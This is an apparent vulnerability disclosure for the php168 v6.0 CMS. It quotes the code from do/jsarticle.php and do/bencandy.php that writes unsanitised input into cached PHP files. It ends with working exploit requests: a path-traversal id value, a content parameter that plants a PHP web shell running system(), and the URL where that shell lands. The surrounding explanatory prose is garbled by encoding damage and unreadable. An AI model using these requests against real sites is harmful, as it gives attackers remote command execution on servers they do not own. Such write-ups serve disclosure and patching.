php168-v6.0shell

 һ do/jsarticle.phpļ
if(!eregi("^(hot|com|new|lastview|like|pic)$",$type)){
die("");
}
$FileName=dirname(__FILE__)."/../cache/jsarticle_cache/";
if($type==''like''){
$FileName.=floor($id/3000)."/";
}else{
unset($id);
} 
$FileName.="{$type}_{$fid}_{$id}.php";
..................
if(!is_dir(dirname($FileName))){
makepath(dirname($FileName));
}
if( (time()-filemtime($FileName))>($webdb["cache_time_$type"]*60) ){
write_file($FileName,"<?php \r\n\$show=stripslashes(''".addslashes($show)."''); ?>");

                                             //write_file渲phpļΪidû

}

ڶ do/bencandy.phpļ
require_once(dirname(__FILE__)."/"."global.php");
!$aid && $aid = intval($id);
$id = $aid;
$page<1 && $page=1;

$min=intval($page)-1;
$erp=$Fid_db[iftable][$fid]?$Fid_db[iftable][$fid]:'''';
$rsdb=$db->get_one("SELECT R.*,A.* FROM {$pre}article$erp A LEFT JOIN {$pre}reply$erp R ON A.aid=R.aid WHERE A.aid=$aid ORDER BY R.topic DESC,R.orderid ASC LIMIT $min,1");

if(!$rsdb){
showerr("ݲ!");
}elseif($fid!=$rsdb[fid]){
showerr("FID");
}
........................
$Cache_FileName=PHP168_PATH."cache/bencandy_cache/".floor($id/3000)."/{$id}_{$page}.php";
if(!$jobs&&$webdb[bencandy_cache_time]&&(time()-filemtime($Cache_FileName))<($webdb[bencandy_cache_time]*60)){
echo read_file($Cache_FileName);
exit;
}
..................................

if(!$jobs&&$webdb[bencandy_cache_time]&&(time()-filemtime($Cache_FileName))>($webdb[bencandy_cache_time]*60)){

if(!is_dir(dirname($Cache_FileName))){
   makepath(dirname($Cache_FileName));
}
$content.="<SCRIPT LANGUAGE=''JavaScript'' src=''$webdb[www_url]/do/job.php?job=updatehits&aid=$id''></SCRIPT>";
write_file($Cache_FileName,$content);      //עдļ
}elseif($jobs==''show''){
@unlink($Cache_FileName);
}
Ҳˣǿ$contentʵʼģϿԿrequire(PHP168_PATH."inc/foot.php");һ䣬ʼõһ⣬ļݣǾͿֱύ$contentעshellˣ

       ã
      do/jsarticle.php?type=like&id=xhming/../../../../inc/foot
      do/bencandy.php?fid=4&id=582&content=<?system($xhming);phpinfo()?>
      cache/bencandy_cache/0/582_1.php   //סidֵлʱжÿһҪȻ
